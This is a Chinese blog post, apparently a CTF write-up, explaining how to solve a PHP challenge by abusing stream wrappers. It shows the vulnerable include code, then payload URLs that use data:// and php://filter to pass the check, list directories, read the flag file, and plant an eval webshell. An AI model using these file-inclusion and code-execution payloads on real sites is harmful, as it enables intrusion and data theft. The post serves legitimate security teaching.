GXUTF_easy_伪协议

最新推荐文章于 2024-03-11 16:36:53 发布
最新推荐文章于 2024-03-11 16:36:53 发布
阅读量97 收藏
点赞数
文章标签: php html5 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chen_3002/article/details/120710187
版权

题目如下

<?php
ini_set('open_basedir','/var/www/html/protocols/');
highlight_file(__FILE__);

$file = $_GET['file'];
$text = $_GET['text'];

if(isset($text)&&(file_get_contents($text,'r')==='how_to_bypass?')){
    $ext = pathinfo($file,PATHINFO_EXTENSION);
    if($ext==='php'){
        include $file;
    }else{
        echo "no no";
    }
}else{
    echo "no";
}

从第一行分析 open_basedir是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域。
举个例子:假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。

也就是说现在用户只能获取/var/www/html/protocols/上的文件,做不出的题目的时候以为是这个原因,但是并不是。

ini_set('open_basedir','/var/www/html/protocols/');

接着分析这一行,file_get_contents() 把整个文件读入一个字符串中,也就是说$text是传入一个文件,最后从文件中读到的字符串是how_to_bypass?

if(isset($text)&&(file_get_contents($text,'r')==='how_to_bypass?')){

了解一下伪协议

data协议

php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码

使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

构造

http://120.24.194.57:2333/protocols?text=data://text/plain,how_to_bypass?&file=php://filter/read=convert.base64-encode/resource=flag.php

text构造了一个读数据的,读出后得到的字串就是how_to_bypass?然后进入if判断

pathinfo() 函数是获得文件后缀,比如获得.php,所以file的参数应该是.php结尾

接下来构造file

首先这是一个file关键字的get参数传递,

php://是一种协议名称,php://filter/是一种访问本地文件的协议,

/read=convert.base64-encode/表示读取的方式是base64编码后,

resource=flag.php表示目标文件为flag.php

以上,并无反应,经过大佬提点,才知道要读目录,目标文件可能并不是flag.php

http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php print_r(glob('*.php'));?>.php

以上是读目录的payload,data://后可以执行php代码,于是用glob函数读目录,得到。php代码后要加.php才能通过pathinfo,这个要注意

便可以得到改掉之前的flag.php

http://120.24.194.57:2333/protocols?text=data://text/plain,how_to_bypass?&file=php://filter/read=convert.base64-encode/resource=fll11llaaaggg.php

得到一串base64编码,解码得到flag. 

以下还有其他读目录的方式

http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php print_r(glob('/var/www/html/protocols/*'));?>.php
http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php print_r(glob('*.*'));?>.php
http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php @eval($_REQUEST[1]);?>.php&1=var_dump(scandir('.'));

这里说一下,eval执行request[1]这个参数,php代码后依然要以.php结尾,1传参var_dump(scandir('.'));var_dump此函数显示关于一个或多个表达式的结构信息,scandir('.') 是列出要扫描的目录中的文件和目录'.'代表当前目录,这里也可以用/var/www/html/protocols/代替。

chen_3002
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
count_easy.rar_easy
09-14
标题中的"count_easy.rar_easy"可能是指一个名为“count_easy”的简单计算器项目,它被压缩在RAR格式的文件中,并且被标记为“easy”,暗示这个项目或程序非常适合编程初学者学习和理解。 描述中提到的"最简单的...
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5383
简单绕过open_basedir 的几种方法
绕过open_basedir
unexpectedthing的博客
07-02 1529
open_basedir绕过
记一题CTF safe_include
最新发布
FROM_my_world的博客
03-11 1482
记一题CTF safe_include
php中函数禁用绕过的原理与利用
蚁景网安学院
12-25 763
是否遇到过费劲九牛二虎之力拿了webshell却发现连个scandir都执行不了?拿了webshell确实是一件很欢乐的事情,但有时候却仅仅只是一个小阶段的结束;本文将会以webshell作为起点从头到尾来归纳bypass disable function的各种姿势。
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
07-06 177
查看源码有提示可以使用file参数, 但是,直接在file跟文件名无法查看,使用php伪协议可以查看到文件内容, /?file=php://filter/convert.base64-encode/resource=index.php 解码后是代码, <?php //index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file
SaoLei.zip_easy
09-14
《C语言实现的扫雷游戏——借助Easy图形库》 在计算机编程的世界里,游戏开发是一种极好的学习和实践编程技巧的方式。今天我们要探讨的是一个使用C语言编写的扫雷小游戏,名为"SaoLei.zip_easy"。这个项目不仅展示...
CriticalSection.rar_easy
09-24
《深入理解临界区:CriticalSection.rar_easy 解析》 临界区(Critical Section)是多线程编程中一个至关重要的概念,它涉及到并发控制和线程同步。在本篇文章中,我们将通过分析"CriticalSection.rar_easy"这个...
DH.rar_easy
09-21
标签“easy_”进一步确认了这个压缩包的内容应该是易于理解和操作的。这可能包括教程文档、代码示例、教学视频或者简化版的计算器软件。在学习过程中,这样的资源可以帮助新手快速上手,建立对IT领域的基本认识。 ...
jicunqi.rar_easy
09-24
在ARM 1138处理器中,硬件寄存器通常通过总线协议进行访问,例如冯·诺依曼架构中的地址总线和数据总线。访问寄存器的方式主要有两种:直接寻址和间接寻址。 1. **直接寻址**:在直接寻址模式下,程序员可以直接...
BMZCTF:Bestphp
末初的CSDN博客
04-25 1335
http://www.bmzclub.cn/challenges#Bestphp index.php <?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html:/tmp'); $file = 'function.php'; $func = isset($_GET['function'])?$_GET['function']:'filte
绕过 open_basedir
m0_64180167的博客
08-11 914
open_basedir是php.ini的设置在open_basedir设置路径的话 那么网站访问的时候 无法访问除了设置以外的内容这里还有一个知识点如果我们设置 open_basedir=/var/www/html那我们只能访问不能访问/var/www/otherfile.php(不在指定目录之下)/var/www/html2/index.php(不是以指定路径为前缀)所以open_basedir并不是以目录名为 规定而是路径我创建了一个test文件夹 存放着 1.php
Bypass open_basedir的方法
rev1ve的博客
11-27 1260
指定在每个 PHP 脚本执行完毕后自动追加的文件,用php伪协议去读取我们编码过的马,其中木马添加00是为了满足解码字节倍数,然后就是文件头绕过。payload构造的注意点就是:要读的文件需要往前跨多少路径,就得创建多少层的子目录,然后输入多少个…题目是给了我们get_the_flag()函数的,对文件上传进行检测。,检测文件头,然后回显上传路径;symlink() 函数创建一个从指定名称连接的现存目标文件开始的符号连接。发现可以异或绕过,但是考虑限制长度,我们构造如下。本地测试一下,这里我设置的路径。
BUUCTF WEB CyperPunk
qq_41696858的博客
03-08 510
打开场景,查看源码,发现hint <!--?file=?--> 于是考虑文件读取漏洞 尝试?file=php://filter/convert.base64-encode/reosurce=index.php 成功回显 PD9waHAKCmluaV9zZXQoJ29wZW5fYmFzZWRpcicsICcvdmFyL3d3dy9odG1sLycpOwoKLy8gJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwokZmlsZSA9IChpc3NldCgkX0dFVFsnZmlsZSd
kss admin index.php,XCTF Final 2018 Web Writeup (Bestphp与PUBG详解)
weixin_42303389的博客
03-11 1535
WEB1——Bestphp这道题提供index.php源码index.phphighlight_file(__FILE__);error_reporting(0);ini_set('open_basedir', '/var/www/html:/tmp');$file = 'function.php';$func = isset($_GET['function'])?$_GET['function'...
open_basedir restriction in effect
showso2006的专栏
09-01 7580
<br />open_basedir: 将用户可操作的文件限制在某目录下;<br /> --------------------------------------------------------------------------------<br /> 如下是php.ini中的原文说明以及默认配置:<br /> ; open_basedir, if set, limits all file operations to the defined directory<br /> ; and bel
访问设置目录
mumama1的博客
02-07 228
看一下这个call函数,它会把close当成参数传入$func, $this->func()的结果会被赋值给 $this->results[$file->name()] 这个一维数组,即我们的file_get_contents('/flag.txt') ,构成了一个$this->results二维数组(也就是$this->results[文件名]['close']) 学过c语言 二维数组更好理解一点。$func:被调用的方法名,所以$func()在这个魔术方法中,可以表示被调用的那个方法;
[SWPUCTF 2018]SimplePHP phar漏洞及其文件上传
qq_54929891的博客
03-27 3258
在查看文件这个页面发现一个可疑参数file,试试能不能读取源代码 根据include包含来将各个文件源代码都提取出来,最重要的是class.php <?php class C1e4r { public $test; public $str; public function __destruct() { $this->test = $this->str; echo $this->test; } } ..
php.ini安全配置禁用危险函数open_basedir防止跨目录
赵一舟的博客
01-29 7181
disable_functions = phpinfo,chroot,chown,chmod,system,shell_exec,passthru,exec,assert,pcntl_exec,proc_open,``,phpfunc,proc_get_status,chgrp,popen,get_cfg_var ; ###################### 禁用的危险函数 BEGIN ###...
ha_easyrecovery.rar
08-02
ha_easyrecovery.rar 是一个RAR压缩文件,它很可能是用于存储和传输数据的文件。具体而言,ha_easyrecovery.rar 可能是用于恢复数据的软件或工具的压缩包。 以"ha_easyrecovery.rar"的名称来看,它可能是Easy...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值